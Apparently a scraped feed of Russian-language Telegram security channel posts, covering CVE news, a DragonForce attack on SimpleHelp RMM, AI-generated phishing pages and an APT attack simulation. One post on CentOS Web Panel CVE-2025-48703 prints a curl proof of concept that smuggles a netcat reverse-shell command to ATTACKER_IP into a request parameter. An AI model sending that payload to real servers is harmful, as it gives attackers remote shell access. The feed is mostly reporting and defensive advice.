www.opennet.ru
Let's Encrypt начнёт выдавать TLS-сертификаты для IP-адресов
Некоммерческий удостоверяющий центр Let's Encrypt, контролируемый сообществом и предоставляющий сертификаты безвозмездно всем желающим, анонсировал начало предоставления бесплатных сертификатов для IP-адресов. В отличие от сертификатов для доменов срок действия…
🔗Ссылка:
https://opennet.ru/63531/
https://opennet.ru/63531/
Forwarded from Whitehat Lab
В поисках полезной информации нашел интересные площадки для DevOps
Это полностью бесплатные интерактивные платформы для тестирования и обучения
Есть теория и различные практические задания
#docker #kubernetes #devops
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек
SimpleHelp RMM CVE-2024-57727
SimpleHelp — это популярная система удаленного мониторинга и управления (RMM), которую используют IT-провайдеры и системные администраторы для управления клиентскими сетями. Система позволяет удаленно подключаться к компьютерам, устанавливать обновления, мониторить состояние систем и решать проблемы без физического присутствия.
RMM-системы критически важны для современного IT-аутсорсинга — через них управляются тысячи endpoint'ов в корпоративных сетях. Именно поэтому компрометация RMM равносильна получению "мастер-ключа" ко всей IT-инфраструктуре клиента.
Трипл килл: CVE-2024-57726, CVE-2024-57727, CVE-2024-57728
В январе 2025 года были раскрыты сразу три критические уязвимости в SimpleHelp:
➡️ CVE-2024-57726 — дополнительная уязвимость безопасности
➡️ CVE-2024-57727 — path traversal уязвимость (основная)
➡️ CVE-2024-57728 — еще одна критическая брешь
CVE-2024-57727 представляет собой path traversal уязвимость в SimpleHelp версий 5.5.7 и ранее. Path traversal позволяет атакующему "выйти" за пределы разрешенной директории, используя последовательности типа `
❗️ DragonForce
Главным эксплуататором этих уязвимостей стала группа DragonForce — не просто ransomware группировка, а целая "картельная модель" с франшизой для аффилиатов. Группа активно перестраивает ландшафт угроз после падения LockBit.
📌 Связи DragonForce:
➡️ Поглощение/взлом сайтов BlackLock, Mamona, RansomHub
➡️ Подозрения в сотрудничестве с Scattered Spider
➡️ Использование advanced техник социальной инженерии
💻 Анатомия атаки на MSP
DragonForce провела sophisticated атаку на британского MSP-провайдера, используя следующую схему:
➡️ Этап 1: Компрометация RMM
- Эксплуатация CVE-2024-57727 для получения доступа к SimpleHelp-серверу MSP
- Получение контроля над RMM-инфраструктурой
➡️ Этап 2: Разведка и закрепление
- Пуш SimpleHelp-инсталлятора клиентам через легитимную RMM-инфраструктуру
- Сканирование инфраструктур клиентов: имена устройств, пользователей, сетевые соединения
- Использование Microsoft Quick Assist и бэкдора QDoor для бесшумного закрепления
- Пребывание в сети до 9 дней до активации шифровальщика
➡️ Этап 3: Атака
- Развертывание шифровальщика и инструментов двойного вымогательства
- Использование визинга + email-бомбинга для дополнительного давления
- Массовые сбои и отключения IT в ритейле Великобритании
❗️ Индикаторы компрометации (мини IoC)
CISA и исследователи выделяют следующие IoC:
➡️ Исполняемые файлы с трехбуквенными именами (aaa.exe, bbb.exe, ccc.exe)
➡️ Время создания файлов после января 2025 года
➡️ Аномальный сетевой трафик от SimpleHelp сервера
➡️ Присутствие Microsoft Quick Assist в неожиданных местах
➡️ Следы QDoor бэкдора в системе
🔖 Рекомендации по защите
0️⃣ Обновление до версии 5.5.8+ — критически важно для всех инсталляций
1️⃣ Изоляция SimpleHelp серверов от интернета до применения патча
2️⃣ Аудит всех трех CVE (57726, 57727, 57728) в системе
3️⃣ Проверка на QDoor и Quick Assist в неожиданных местах
❗️ Для MSP и IT-провайдеров:
➡️ Немедленный аудит всех клиентских подключений через SimpleHelp
➡️ Проверка логов на подозрительную активность с января 2025
➡️ Уведомление клиентов о необходимости threat hunting
➡️ Временное отключение RMM-доступа до полной проверки
🕰 Проверка компрометации:
➡️ Поиск файлов с трехбуквенными именами, созданных после января 2025
➡️ Анализ сетевого трафика на аномалии
➡️ Проверка наличия Microsoft Quick Assist в системах, где он не должен быть
➡️ Поиск следов QDoor бэкдора
Долгосрочные меры:
➡️ Внедрение Zero Trust архитектуры для RMM-систем
➡️ Сегментация сети между RMM и критическими системами
➡️ Мониторинг всех RMM-подключений в реальном времени
➡️ Создание incident response плана для RMM-компрометации
💬 Выводы
CVE-2024-57727 и связанные уязвимости показывают, что в эпоху cloud-first и remote-first подходов, безопасность управляющих систем должна быть приоритетом номер один.
SimpleHelp — это популярная система удаленного мониторинга и управления (RMM), которую используют IT-провайдеры и системные администраторы для управления клиентскими сетями. Система позволяет удаленно подключаться к компьютерам, устанавливать обновления, мониторить состояние систем и решать проблемы без физического присутствия.
RMM-системы критически важны для современного IT-аутсорсинга — через них управляются тысячи endpoint'ов в корпоративных сетях. Именно поэтому компрометация RMM равносильна получению "мастер-ключа" ко всей IT-инфраструктуре клиента.
Трипл килл: CVE-2024-57726, CVE-2024-57727, CVE-2024-57728
В январе 2025 года были раскрыты сразу три критические уязвимости в SimpleHelp:
CVE-2024-57727 представляет собой path traversal уязвимость в SimpleHelp версий 5.5.7 и ранее. Path traversal позволяет атакующему "выйти" за пределы разрешенной директории, используя последовательности типа `
../` для доступа к произвольным файлам системы.Главным эксплуататором этих уязвимостей стала группа DragonForce — не просто ransomware группировка, а целая "картельная модель" с франшизой для аффилиатов. Группа активно перестраивает ландшафт угроз после падения LockBit.
DragonForce провела sophisticated атаку на британского MSP-провайдера, используя следующую схему:
- Эксплуатация CVE-2024-57727 для получения доступа к SimpleHelp-серверу MSP
- Получение контроля над RMM-инфраструктурой
- Пуш SimpleHelp-инсталлятора клиентам через легитимную RMM-инфраструктуру
- Сканирование инфраструктур клиентов: имена устройств, пользователей, сетевые соединения
- Использование Microsoft Quick Assist и бэкдора QDoor для бесшумного закрепления
- Пребывание в сети до 9 дней до активации шифровальщика
- Развертывание шифровальщика и инструментов двойного вымогательства
- Использование визинга + email-бомбинга для дополнительного давления
- Массовые сбои и отключения IT в ритейле Великобритании
CISA и исследователи выделяют следующие IoC:
Долгосрочные меры:
CVE-2024-57727 и связанные уязвимости показывают, что в эпоху cloud-first и remote-first подходов, безопасность управляющих систем должна быть приоритетом номер один.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Whitehat Lab
Fenrisk
Remote code execution in CentOS Web Panel - CVE-2025-48703
Security experts
RCE уязвимость приложения для управления серверами CentOS Web Panel
Проблема в функции
acc=changePerm, где не производится должная проверка входных данных, что позволяет выполнить произвольный код в параметре t_total❗️ Эту атаку можно выполнить с минимальной аутентификацией или в некоторых конфигурациях, с не аутентифицированным доступом.
PoC:
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
#cve #poc #centoswebpanel #web
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Релиз командной оболочки Bash 5.3
После почти трёх лет разработки опубликована новая версия командного интерпретатора GNU Bash 5.3, используемого по умолчанию в большинстве дистрибутивов Linux. Одновременно сформирован релиз библиотеки readline 8.3, применяемой в bash для организации редактирования…
🔗Ссылка:
https://opennet.ru/63532/
https://opennet.ru/63532/
Forwarded from Похек
This media is not supported in your browser
VIEW IN TELEGRAM
Vercel v0: От AI-помощника до инструмента киберпреступников
➡️ Что такое Vercel v0
Vercel v0 — это AI-инструмент от компании Vercel, который позволяет создавать веб-приложения и лендинги с помощью естественного языка. Пользователь вводит текстовый промпт, а v0 генерирует готовый код с использованием React, Tailwind CSS и других современных технологий. Инструмент предназначен для быстрого прототипирования и создания базовых веб-интерфейсов без глубоких знаний программирования.
➡️ Техническая эксплуатация в фишинговых атаках
Исследователи Okta обнаружили, что киберпреступники активно используют v0 для создания поддельных страниц входа. Злоумышленники генерируют копии логин-форм крупных сервисов простыми промптами типа "создай страницу входа Facebook" или "сделай форму авторизации Gmail".
➡️ Технические преимущества для атакующих:
➡️ Скорость разработки: Создание фишингового сайта занимает минуты вместо часов
➡️ Качество кода: AI генерирует современный, адаптивный код с правильной структурой
➡️ Обход детекции: Сайты размещаются на доверенной инфраструктуре Vercel
➡️ Низкий порог входа: Не требуются навыки веб-разработки
➡️ Методы размещения
Злоумышленники используют несколько тактик:
➡️ Хостинг поддельных логотипов компаний на серверах Vercel для повышения доверия
➡️ Создание поддоменов, имитирующих легитимные сервисы
➡️ Интеграция с существующими фишинговыми инфраструктурами
➡️ Эволюция угрозы
Этот случай демонстрирует новый тренд — использование генеративного AI для автоматизации создания фишинговых ресурсов. В отличие от традиционных фишинг-китов, требующих технических навыков, AI-инструменты демократизируют создание качественных поддельных сайтов.
Vercel уже заблокировал доступ к обнаруженным фишинговым ресурсам, но проблема системная — любой AI-инструмент для веб-разработки может быть аналогично эксплуатирован.
🔗 Источник
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Vercel v0 — это AI-инструмент от компании Vercel, который позволяет создавать веб-приложения и лендинги с помощью естественного языка. Пользователь вводит текстовый промпт, а v0 генерирует готовый код с использованием React, Tailwind CSS и других современных технологий. Инструмент предназначен для быстрого прототипирования и создания базовых веб-интерфейсов без глубоких знаний программирования.
Исследователи Okta обнаружили, что киберпреступники активно используют v0 для создания поддельных страниц входа. Злоумышленники генерируют копии логин-форм крупных сервисов простыми промптами типа "создай страницу входа Facebook" или "сделай форму авторизации Gmail".
Злоумышленники используют несколько тактик:
Этот случай демонстрирует новый тренд — использование генеративного AI для автоматизации создания фишинговых ресурсов. В отличие от традиционных фишинг-китов, требующих технических навыков, AI-инструменты демократизируют создание качественных поддельных сайтов.
Vercel уже заблокировал доступ к обнаруженным фишинговым ресурсам, но проблема системная — любой AI-инструмент для веб-разработки может быть аналогично эксплуатирован.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AppSec Journey
redteaming toolkit.pdf
325.4 KB
Периодически подкидываю сюда всякие тулкиты не только для защиты, а еще и для тестирования.
Прям чотинькая подборка в этом, мне нравится! Все приблуды опенсорс, так что наслаждайтесь.
Прям чотинькая подборка в этом, мне нравится! Все приблуды опенсорс, так что наслаждайтесь.
❤2
www.opennet.ru
Уязвимости в СУБД Redis и Valkey
Опубликованы корректирующие выпуски СУБД Redis (6.2.19, 7.2.10, 7.4.5, 8.0.3) и Valkey (8.0.4, 8.1.3), в которых устранены две уязвимости. Наиболее опасная уязвимость (CVE-2025-32023) потенциально может привести к удалённому выполнению кода на сервере из…
🔗Ссылка:
https://opennet.ru/63537/
https://opennet.ru/63537/
Forwarded from BEAR-C2
This media is not supported in your browser
VIEW IN TELEGRAM
🚨Фишинговая атака через фальшивое предложение работы🚨
Это симуляция атаки, осуществлённой APT-группировкой (#FamousChollima), нацеленная на соискателей работы с целью достижения своих целей и компрометации множества американских компаний. Кампания была активна с декабря 2022 года.
Цепочка атаки начинается с того, что злоумышленники приглашают жертву пройти онлайн-собеседование. Вероятнее всего, они используют видеоконференцсвязь или другие онлайн-инструменты для общения.
Во время интервью злоумышленники убеждают жертву скачать и установить NPM-пакет, размещённый на GitHub. Этот пакет представляется как программа для анализа или проверки, но на самом деле содержит вредоносный JavaScript-код, предназначенный для заражения устройства жертвы бэкдором.
🔗 Репозиторий на GitHub:
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT/Famous%20Chollima
#AdversarySimulation
Это симуляция атаки, осуществлённой APT-группировкой (#FamousChollima), нацеленная на соискателей работы с целью достижения своих целей и компрометации множества американских компаний. Кампания была активна с декабря 2022 года.
Цепочка атаки начинается с того, что злоумышленники приглашают жертву пройти онлайн-собеседование. Вероятнее всего, они используют видеоконференцсвязь или другие онлайн-инструменты для общения.
Во время интервью злоумышленники убеждают жертву скачать и установить NPM-пакет, размещённый на GitHub. Этот пакет представляется как программа для анализа или проверки, но на самом деле содержит вредоносный JavaScript-код, предназначенный для заражения устройства жертвы бэкдором.
🔗 Репозиторий на GitHub:
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT/Famous%20Chollima
#AdversarySimulation
❤2